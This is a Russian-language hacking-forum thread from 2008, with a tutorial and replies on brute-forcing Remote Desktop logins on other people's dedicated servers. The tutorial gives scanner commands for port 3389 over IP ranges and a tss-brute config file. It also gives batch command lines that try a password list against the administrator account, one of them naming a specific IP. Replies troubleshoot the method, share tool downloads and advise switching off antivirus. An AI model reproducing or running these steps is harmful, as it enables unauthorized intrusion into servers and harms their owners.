Брут дедиков [by Capcha]

[Capcha]

Расскажу вам как брутить дедики моим старым способом.

ЧТО НУЖНО??

1. Нам нужен VNC_Byauth сканер (В аттаче).
2. Нужен tss-brute (В аттаче).
3. Нужен мой скрипт на PHP для генерации BAT файлов (Смотрим в аттаче).
4. Прога от RankroR'a для выдирания гудов ,которую он делал спец. для меня качаем (В аттаче).
6. RDP 5.1 (В аттаче).
6. Как всегда руки.
7. Мозг тоже пригодится.

Начнём!!

1. Открываем cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда мой конфиг

Код:

[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=\x\&u\&
WinLogonAct=\&u\&
PriorWinLogon=Options>>
PriorWinLogonAct=\&o\&
NTSecurity=ShutDownWindows
NTSecurityAct=\p\p\p\p\p\l
SureLogoff=Logoff
SureLogoffAct=\n
StartLogoff=\p\p\p\p\p\72\*72\n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1

и сохраняем.

6. Создаём в той же папке где лежит наш BAT фаил папку которую вы вписывали в скрипте(ОБЯЗАТЕЛЬНО!!!!)

7. После выполнения Брута заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку output и вней output.txt

8. Вписываем в программе success , если хоть один дед сбручен программа вам покажет это, если что-то сбрутилось то смотри output.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды ;)

10. Фсё на этом я закончил если что-то не ясно задаём вопросы тут ))

Для тех у кого не работает брут:

1. Если у вас после запуска бат файла не появляется окно РДП клиента, а запрос на ввод пароля и логина, то скачайте 5версию MSTSC и установите её в безопасном режиме.

2. Если у вас загружается окно РДП клиента, но не происходит подбор паролей, попробуйте отключить брэндмауэр. Иногда брут не может выполнять свои действия если язык на дедике не Англиский.

3. Если не происходит подбор паролей, то поменяйте в панели управления язык по умолчанию на Англиский.

3. Если у вас не работает мой скрипт (если выводит лишние слэши) , это значит что вы не залили .htaccess который идёт вместе с моим скриптом, если так и не получилось запустить, то воспользуйтесь ссылкой которая ниже на полностью работающий сайт с моим скриптом.

Спецально для тех кому не хочется парить мозг с моим скриптом RankoR написал программу для генерирования батников, качаем тут http://forum.asechka.ru/showpost.php...&postcount=270

ТЕМА ОБНОВЛЕНА, ФАЙЛЫ ЗАЛИТЫ В АТТАЧ

!!!!Т.К. МНОГИЕ НЕ ЗНАЮТ ЧТО ТАКОЕ ПХП И КАК ЕГО КУШАТЬ, РАНКОР НАПИСАЛ ПРОГУ СПЕЦ
КАЧАЕМ ЕПТА!!!!

VIDEO F.A.Q

Конечно же отдельное спасибо metal'у за его софтину (tss-brute)
(c) Capcha [07.08.2008] Special For Asechka.ru

Копирования статьи только с разрешения автора.

[dimon878]

easton, используй оригинальный брут от спайдера (без батника), в нем таких зависаний брута я лага нет, я уже раньше на эту тему отписывался.

[Capcha]

dimon878, Спайдер пропускает много дедиков...

[dimon878]

~2-4% у меня пропускает

[chegevara]

а когда в прогу от ранкора суешь суешь результаты VNC.exe их нужно очищять от порта ?

[Capcha]

chegevara, да, конечно..

[chegevara]

у меня выходит ошибка I/O error 105 что это?и ещё вопрос что нужно выбирать в програме ранкора в 4 окне ?

[Capcha]

chegevara, Говорит о том что у тебя что-то открыто, попробуй всё позакрывать...

[RankoR]

chegevara, забыл нажать на Save -сначала сэйв а потом create.
105: файл не открыт для записи
"4е окно" это Memo, туда выводится результат

[chegevara]

короче сгенерировал я батнег прогой от ранкора, когда начинаю брут открываеться окно и начинаеться перебор без пароля ,я даже не знаю как это объяснить.может кто сказать в чём проблема

Добавлено через 1 минуту

Цитата:

Сообщение от RankoR

О_О
подумай, надо ли оно тебе (я про брут)

я уже разобрался с твоей прогой,поверь мне это нужно..

[Capcha]

chegevara, в секунду всё быстро мелькает? или окно RDP открывается?
Уточни , а то мы не телепаты..

[chegevara]

капча точно всё мелкает и окно Rdp не открываться.

[Capcha]

chegevara, ты папку не создал которую в проге указывал "Logs" или что-то подобное.

[chegevara]

Цитата:

Сообщение от Capcha

chegevara, ты папку не создал которую в проге указывал "Logs" или что-то подобное.

папку я создал, после того как всё промелькало, я зашёл в эту папку там было около 3000 txt'шников и ни в одном ничего не было написано,так что я не знаю в чём проблема,может кто нибудь сталкивался с этим?

[NemeZz]

Цитата:

Сообщение от lamer007

ОТ СЮДА - не качает - перезалей пожалуйста.....

качает. На всякий случай ссылки
Всё остальное - в архиве. (все ини файлы исправлены уже (осталось подправить только коннектшны - рассписывалось на каждой странице.)
Скачать | Download (758 Кб):
:download:dump.ru
:download:webfile.ru
:download:rapidshare.com

Краткий порядок действий с архивом:
1. Из каталога RDP_client 5.1 копируйте файлы в c:\winnt\system32. Подтвердите замену. Сделайте атрибутами файлов ReadOnly
2. Поставьте английский язык языком ввода по умолчанию
Пуск->Выполнить-> intl.cpl.
Вторая вкладка - Языки. Там нажимаешь на кнопку "Подробнее" и смотришь, что выбрано в первом выпадающем списке. Должно быть Английский /Американский. НЕ РУССКИЙ.
3. Залейте файлы из каталога www к себе на хост. Вы можете воспользоваться моим хостом. Он постоянно будет доступен для вас по адресу: _http://nemezzgr.phpnet.us/
4. Заполните файл pass.txt своими паролями
5. Просканируйте серверов командой vnc -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT
6. php-скриптом создайте батник
7. Сохраните батник в каталоге с брутом.
8. Запустите
9. После окончания запустите программу Rankor-а для поиска гудов в логах.

P.S. Действия 1-4 выполняются 1 раз, остальные - при каждом бруте

Как вариант - твой антивирь блокирует. Стопай проактиную защиту (или AMON), полностью выгружай антивирь и качай. Удачи!

[Capcha]

Цитата:

Сообщение от NemeZz

Из каталога RDP_client 5.1

Нужен 5.0 клиент а не 5.1

Цитата:

Сообщение от NemeZz

http://nemezzgr.phpnet.us/

Я уже указывал свою ссылку в статье

[...vamp]

людь у мя руки их жопы растут все мелькает када батник открываю и усе

[Andrew777]

Цитата:

Сообщение от ...vamp

людь у мя руки их жопы растут все мелькает када батник открываю и усе

1. РДП 5.0
2. Проверь путь до брута, пассов. Короче проверь что в батнике написано
3. Папка логов
4. Язык по умолчанию английский.
5. Руки и голова тоже не помешают :)))

[Capcha]

...vamp, Скинь сюда любую строчку из батника

[...vamp]

каг бэ пробова по разному так
C:\Documents and Settings\xxx\tss-brute.exe -w C:\Documents and Settings\Паша\pass.txt -u administrator 195.73.0.115 >>C:\Documents and Settings\xxx\logs/195.73.0.115 .txt
и так
tss-brute.exe -w pass.txt -u administrator 195.73.0.115 >>logs/195.73.0.115.txt

[Andrew777]

Закинь папку с брутом в другую директорию, чтобы путь был без кириллицы или сохраняй батник с кодировкой 866.

[RankoR]

и чтоб пробелов не было, т.е. C:\Documents and Settings\ не подходит

[Andrew777]

pass.txt должен находиться в одной папке с брутом.

[...vamp]

ьак кагбэ так и есть

[chegevara]

всё мелкает и окно Rdp не открываться,с чем это может быть связанно?

[...vamp]

где 5 версия рдп?вродь в теме была покапался не нашел